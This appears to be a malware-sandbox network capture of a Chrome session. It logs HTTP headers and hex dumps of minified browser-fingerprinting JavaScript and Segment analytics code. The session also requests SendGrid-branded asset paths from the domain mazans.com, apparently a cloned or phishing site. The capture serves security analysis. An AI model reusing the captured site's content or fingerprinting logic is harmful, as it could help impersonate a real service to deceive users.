                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC14786INData Raw: 74 68 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 74 5b 30 5d 2c 72 3d 74 5b 30 5d 2c 65 3d 31 3b 65 3c 74 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 74 5b 65 5d 3c 6e 26 26 28 6e 3d 74 5b 65 5d 29 2c 74 5b 65 5d 3e 72 26 26 28 72 3d 74 5b 65 5d 29 3b 72 65 74 75 72 6e 20 72 2d 6e 7d 28 65 29 3c 3d 36 29 72 65 74 75 72 6e 20 5f 74 28 38 32 2c 74 5b 72 5d 29 2c 21 30 7d 7d 2c 72 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 63 2e 71 72 28 29 7d 2c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 75 5b 6f 2e 58 28 22 4e 4e 61 66 58 7f 78 65 42 72 63 78 61 65 62 22 2c 31 37 29 5d 7d 2c 69 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6f 2e 58 28 22 38 3a 3d 22 2c 39 35 29 3b 69 66 28 75 5b 74 5d 26 26 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: th)return!1;for(var n=t[0],r=t[0],e=1;e<t.length;e++)t[e]<n&&(n=t[e]),t[e]>r&&(r=t[e]);return r-n}(e)<=6)return _t(82,t[r]),!0}},rr=function(){return!!c.qr()},er=function(){return!!u[o.X("NNafXxeBrcxaeb",17)]},ir=function(){var t=o.X("8:=",95);if(u[t]&&"
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC311INData Raw: 31 33 30 0d 0a 28 2f 5e 28 5b 41 2d 5a 61 2d 7a 5d 5b 61 2d 7a 5d 2a 29 5b 41 2d 5a 5d 2f 2e 65 78 65 63 28 65 29 7c 7c 5b 5d 29 5b 31 5d 29 26 26 28 28 74 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 69 6e 20 6e 3f 6e 5b 74 5d 2b 2b 3a 6e 5b 74 5d 3d 31 29 3b 72 65 74 75 72 6e 20 6e 7d 28 29 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 65 29 6e 2e 70 75 73 68 28 5b 69 2c 65 5b 69 5d 5d 29 3b 66 6f 72 28 76 61 72 20 61 3d 6e 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 5b 31 5d 2d 74 5b 31 5d 7d 29 2e 73 6c 69 63 65 28 30 2c 31 30 29 2c 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 22 6d 6f 7a 22 3d 3d 3d 28 74 3d 6e 5b 63 5d 5b 30 5d 29 26 26 28 72 2e 67 2b 3d 35 29 2c 22 6d 73 22 3d 3d 3d 74 26 26 28
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 130(/^([A-Za-z][a-z]*)[A-Z]/.exec(e)||[])[1])&&((t=t.toLowerCase())in n?n[t]++:n[t]=1);return n}();for(var i in e)n.push([i,e[i]]);for(var a=n.sort(function(t,n){return n[1]-t[1]}).slice(0,10),c=0;c<a.length;c++)"moz"===(t=n[c][0])&&(r.g+=5),"ms"===t&&(
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 62 35 33 66 0d 0a 74 26 26 28 72 2e 70 2b 3d 32 29 2c 22 78 76 22 3d 3d 3d 74 26 26 28 72 2e 70 2b 3d 32 29 3b 72 65 74 75 72 6e 20 6f 2e 46 28 72 2c 22 2c 22 2c 21 30 29 7d 2c 59 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 69 66 28 7a 26 26 7a 3e 39 30 26 26 21 6f 2e 4e 28 35 30 29 29 72 65 74 75 72 6e 3b 76 61 72 20 74 2c 6e 3d 24 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 74 72 79 7b 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 72 2c 65 2c 69 2c 61 2c 63 3d 7b 72 61 6e 64 3a 30 7d 2c 75 3d 5b 22 77 71 33 65 61 61 79 38 31 32 33 71 77 32 31 22 2c 22 55 62 75 6e 74 75 22 2c 22 55 74 6f 70 69 61 22 2c 22 55 52 57 20 47 6f 74 68 69 63 20 4c 22 2c 22 42 69 74 73 74 72 65 61 6d 20 43 68 61 72 74 65 72 22 2c 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: b53ft&&(r.p+=2),"xv"===t&&(r.p+=2);return o.F(r,",",!0)},Yr=function(){try{if(z&&z>90&&!o.N(50))return;var t,n=$.contentWindow.document;try{t=function(){var t,r,e,i,a,c={rand:0},u=["wq3eaay8123qw21","Ubuntu","Utopia","URW Gothic L","Bitstream Charter","
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 79 2e 51 65 7c 7c 28 79 2e 51 65 3d 74 29 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 22 68 69 64 64 65 6e 22 3d 3d 3d 63 2e 7a 74 28 29 26 26 79 2e 4b 65 2e 70 75 73 68 28 7b 65 76 3a 22 69 64 68 22 2c 69 6e 74 3a 74 2e 74 79 70 65 2c 74 72 3a 63 2e 56 74 28 74 29 2c 74 3a 6e 7d 29 7d 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 72 3d 76 2e 62 6f 64 79 2c 65 3d 5b 5b 72 2c 22 6b 65 79 64 6f 77 6e 22 5d 2c 5b 72 2c 22 74 6f 75 63 68 73 74 61 72 74 22 5d 2c 5b 72 2c 22 74 6f 75 63 68 65 6e 64 22 5d 2c 5b 72 2c 22 74 6f 75 63 68 63 61 6e 63 65 6c 22 5d 2c 5b 72 2c 22 74 6f 75 63 68 6d 6f 76 65 22 5d 2c 5b 72 2c 63 2e 4c 74 28 29 5d 2c 5b 72 2c 22 64 62 6c 63 6c 69 63 6b 22 5d 2c 5b 73
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: =function(t,n){y.Qe||(y.Qe=t)},b=function(t,n){"hidden"===c.zt()&&y.Ke.push({ev:"idh",int:t.type,tr:c.Vt(t),t:n})},w=function(t,n){var r=v.body,e=[[r,"keydown"],[r,"touchstart"],[r,"touchend"],[r,"touchcancel"],[r,"touchmove"],[r,c.Lt()],[r,"dblclick"],[s
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC13639INData Raw: 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 2c 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 2c 63 2e 6e 61 76 69 67 61 74 6f 72 2c 7b 5a 72 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 74 72 79 7b 76 61 72 20 72 3d 6e 2e 61 70 64 3b 72 65 74 75 72 6e 20 61 2e 47 74 28 6f 2e 4d 6e 2c 74 2c 72 2c 38 36 34 30 30 29 7c 7c 22 2d 22 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 22 2d 22 7d 7d 2c 6d 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 61 2e 24 74 28 6f 2e 4d 6e 29 7c 7c 22 2d 22 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 22 2d 22 7d 7d 2c 79 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 7c 7c 21 74 2e 63 6b 29 72 65 74 75 72 6e 22 22 3b 74 72 79 7b 76 61 72 20 6e 3d 6f 2e 44 6e 2c 72 3d 61 2e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ncodeURIComponent,decodeURIComponent,c.navigator,{Zr:function(t,n){try{var r=n.apd;return a.Gt(o.Mn,t,r,86400)||"-"}catch(t){return"-"}},me:function(){try{return a.$t(o.Mn)||"-"}catch(t){return"-"}},ye:function(t){if(!t||!t.ck)return"";try{var n=o.Dn,r=a.
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          33192.168.2.174981599.86.8.1754436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC586OUTGET /v1/projects/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/settings HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: cdn.segment.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC741INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 726
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                                                                                                                          x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 25 Jul 2024 18:51:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          x-amz-version-id: 6gO29ZVhFg1WEwgot.7OvkeUMt5RLeki
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=10800
                                                                                                                                                                                                                                                                                                                                                                          ETag: "b78f37c2b9d6dae1a4e8aa118b9b553f"
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 35c75b7f0ca8c787d67c8ebd22bc7fc2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: jNlkd9Oz_xuvGCj8u8eYDC1nNbqlPR4nSvUNP9NGYHg3hn9DhGvVww==
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC726INData Raw: 7b 22 69 6e 74 65 67 72 61 74 69 6f 6e 73 22 3a 7b 22 52 65 70 65 61 74 65 72 22 3a 7b 22 76 65 72 73 69 6f 6e 53 65 74 74 69 6e 67 73 22 3a 7b 22 63 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 73 22 3a 5b 22 73 65 72 76 65 72 22 5d 7d 2c 22 74 79 70 65 22 3a 22 73 65 72 76 65 72 22 7d 2c 22 53 65 67 6d 65 6e 74 2e 69 6f 22 3a 7b 22 61 70 69 4b 65 79 22 3a 22 31 43 6a 6e 42 4e 50 79 62 57 7a 79 76 31 30 73 73 5a 52 78 64 77 6d 62 38 76 72 59 46 34 79 6a 22 2c 22 75 6e 62 75 6e 64 6c 65 64 49 6e 74 65 67 72 61 74 69 6f 6e 73 22 3a 5b 22 4d 61 72 6b 65 74 6f 20 56 32 22 5d 2c 22 61 64 64 42 75 6e 64 6c 65 64 4d 65 74 61 64 61 74 61 22 3a 74 72 75 65 2c 22 6d 61 79 62 65 42 75 6e 64 6c 65 64 43 6f 6e 66 69 67 49 64 73 22 3a 7b 7d 2c 22 76 65 72 73 69 6f 6e 53 65 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {"integrations":{"Repeater":{"versionSettings":{"componentTypes":["server"]},"type":"server"},"Segment.io":{"apiKey":"1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj","unbundledIntegrations":["Marketo V2"],"addBundledMetadata":true,"maybeBundledConfigIds":{},"versionSet


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          34192.168.2.174981499.86.8.1754436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:12 UTC404OUTGET /analytics.js/v1/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/analytics.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: cdn.segment.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC742INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 105589
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                                                                                                                          x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 29 Jul 2024 20:07:04 GMT
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          x-amz-version-id: uK1E2D6uYmQ2VcCu3HXELM3zdpmI61Pm
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:12 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=120
                                                                                                                                                                                                                                                                                                                                                                          ETag: "06e7811332c76cc2b35da692acd1f134"
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 7ce1191b390045e05b9cc74f7514b77a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: 2yNZ_8TRNOyEOqIdibEeX-ChHsNPo3TZLo-RRbmQrA9IY6M64sEkVg==
                                                                                                                                                                                                                                                                                                                                                                          Age: 2
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 2c 6e 2c 72 2c 69 3d 7b 38 38 37 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 69 6d 70 6f 72 74 44 65 66 61 75 6c 74 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 74 3a 7b 64 65 66 61 75 6c 74 3a 74 7d 7d 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 69 3d 72 28 6e 28 33 32 35 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: !function(){var t,e,n,r,i={8878:function(t,e,n){"use strict";var r=this&&this.__importDefault||function(t){return t&&t.__esModule?t:{default:t}};Object.defineProperty(e,"__esModule",{value:!0});var i=r(n(325));function o(t,e){return function(){var n=this.
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 2e 69 73 41 72 72 61 79 28 74 29 3f 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 74 5b 72 5d 3d 69 28 6e 2c 65 29 7d 29 29 2c 74 7d 28 74 2c 65 29 3a 72 2e 69 73 28 74 2c 65 29 3f 72 2e 70 61 72 73 65 28 74 29 3a 74 7d 74 2e 65 78 70 6f 72 74 73 3d 69 7d 2c 38 32 36 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 2f 5e 28 5c 64 7b 34 7d 29 28 3f 3a 2d 3f 28 5c 64 7b 32 7d 29 28 3f 3a 2d 3f 28 5c 64 7b 32 7d 29 29 3f 29 3f 28 3f 3a 28 5b 20 54 5d 29 28 5c 64 7b 32 7d 29 3a 3f 28 5c 64 7b 32 7d 29 28 3f 3a 3a 3f 28 5c 64 7b 32 7d 29 28 3f 3a 5b 2c 5c 2e 5d 28 5c 64 7b 31 2c 7d 29 29 3f 29 3f 28 3f 3a 28 5a 29
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: .isArray(t)?function(t,e){return t.forEach((function(n,r){t[r]=i(n,e)})),t}(t,e):r.is(t,e)?r.parse(t):t}t.exports=i},8264:function(t,e){"use strict";var n=/^(\d{4})(?:-?(\d{2})(?:-?(\d{2}))?)?(?:([ T])(\d{2}):?(\d{2})(?::?(\d{2})(?:[,\.](\d{1,}))?)?(?:(Z)
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 70 73 3a 5b 5d 7d 3b 72 65 74 75 72 6e 20 6f 3d 7b 6e 65 78 74 3a 75 28 30 29 2c 74 68 72 6f 77 3a 75 28 31 29 2c 72 65 74 75 72 6e 3a 75 28 32 29 7d 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 6f 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 29 2c 6f 3b 66 75 6e 63 74 69 6f 6e 20 75 28 75 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 75 29 7b 69 66 28 6e 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 6f 26 26 28 6f 3d 30 2c 75 5b 30 5d 26
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ps:[]};return o={next:u(0),throw:u(1),return:u(2)},"function"==typeof Symbol&&(o[Symbol.iterator]=function(){return this}),o;function u(u){return function(a){return function(u){if(n)throw new TypeError("Generator is already executing.");for(;o&&(o=0,u[0]&
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 22 22 2c 22 22 2c 22 22 29 29 3b 76 61 72 20 77 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 6e 2c 72 3d 74 2e 63 2c 69 3d 74 2e 70 2c 6f 3d 74 2e 73 2c 73 3d 74 2e 75 2c 75 3d 74 2e 72 2c 61 3d 74 2e 74 2c 63 3d 72 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 55 52 4c 28 74 29 2e 70 61 74 68 6e 61 6d 65 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 22 2f 22 3d 3d 3d 74 5b 30 5d 3f 74 3a 22 2f 22 2b 74 7d 7d 28 72 29 3a 69 2c 6c 3d 72 3f 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 3e 2d 31 3f 74 3a 74 2b 65 7d 28 72 2c 6f 29 3a 2d 31 3d 3d 3d 28 6e 3d 28 65 3d 73 29 2e 69 6e 64 65 78 4f 66 28 22 23 22 29 29 3f 65 3a 65 2e 73 6c 69 63 65 28 30
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: "","",""));var w=function(t){var e,n,r=t.c,i=t.p,o=t.s,s=t.u,u=t.r,a=t.t,c=r?function(t){try{return new URL(t).pathname}catch(e){return"/"===t[0]?t:"/"+t}}(r):i,l=r?function(t,e){return t.indexOf("?")>-1?t:t+e}(r,o):-1===(n=(e=s).indexOf("#"))?e:e.slice(0
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 74 79 70 65 2e 72 65 6d 6f 76 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 57 2e 72 65 6d 6f 76 65 28 74 2c 74 68 69 73 2e 6f 70 74 73 28 29 29 7d 2c 65 7d 28 29 2c 59 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 57 61 72 6e 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 55 6e 61 62 6c 65 20 74 6f 20 61 63 63 65 73 73 20 22 2e 63 6f 6e 63 61 74 28 74 2c 22 2c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 20 6d 61 79 20 62 65 20 22 29 2e 63 6f 6e 63 61 74 28 65 29 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: type.remove=function(t){return W.remove(t,this.opts())},e}(),Y=function(){function t(){}return t.prototype.localStorageWarning=function(t,e){console.warn("Unable to access ".concat(t,", localStorage may be ").concat(e))},t.prototype.get=function(t){var e;
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC16384INData Raw: 69 73 5d 7d 7d 29 29 7d 29 29 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 44 65 73 74 69 6e 61 74 69 6f 6e 4d 69 64 64 6c 65 77 61 72 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 65 5b 6e 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 71 75 65 75 65 2e 70 6c 75 67 69 6e 73 2e 66 69 6c 74 65 72 28 46 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 2a 22 21 3d 3d 74 26 26 6e 2e 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 21 3d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7c 7c 6e 2e 61 64 64 4d 69 64 64 6c 65 77 61 72 65 2e 61 70 70 6c 79 28 6e 2c 65 29 7d 29
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: is]}}))}))},n.prototype.addDestinationMiddleware=function(t){for(var e=[],n=1;n<arguments.length;n++)e[n-1]=arguments[n];return this.queue.plugins.filter(F).forEach((function(n){"*"!==t&&n.name.toLowerCase()!==t.toLowerCase()||n.addMiddleware.apply(n,e)})
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC7285INData Raw: 6b 65 79 73 28 4f 2e 69 6e 74 65 67 72 61 74 69 6f 6e 73 29 2e 6c 65 6e 67 74 68 3e 31 7c 7c 61 2e 6c 65 6e 67 74 68 3e 30 3f 5b 34 2c 73 2e 65 28 34 36 34 29 2e 74 68 65 6e 28 73 2e 62 69 6e 64 28 73 2c 33 31 36 32 29 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 6a 73 44 65 73 74 69 6e 61 74 69 6f 6e 73 28 65 2c 6e 2c 69 2e 69 6e 74 65 67 72 61 74 69 6f 6e 73 2c 6f 2c 68 2c 61 29 7d 29 29 5d 3a 5b 33 2c 35 5d 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 6d 3d 6b 2e 73 65 6e 74 28 29 2c 5b 33 2c 36 5d 3b 63 61 73 65 20 35 3a 6d 3d 5b 5d 2c 6b 2e 6c 61 62 65 6c 3d 36 3b 63 61 73 65 20 36 3a 72 65 74 75 72 6e 20 79 3d 6d 2c 6e 2e 6c 65 67 61 63 79 56 69 64 65 6f 50 6c 75 67 69 6e 73 45 6e 61 62 6c 65 64 3f 5b 34
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: keys(O.integrations).length>1||a.length>0?[4,s.e(464).then(s.bind(s,3162)).then((function(t){return t.ajsDestinations(e,n,i.integrations,o,h,a)}))]:[3,5];case 4:return m=k.sent(),[3,6];case 5:m=[],k.label=6;case 6:return y=m,n.legacyVideoPluginsEnabled?[4


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          35192.168.2.1749824162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:13 UTC610OUTGET /content/dam/sendgrid/core-assets/social/site.webmanifest HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: manifest
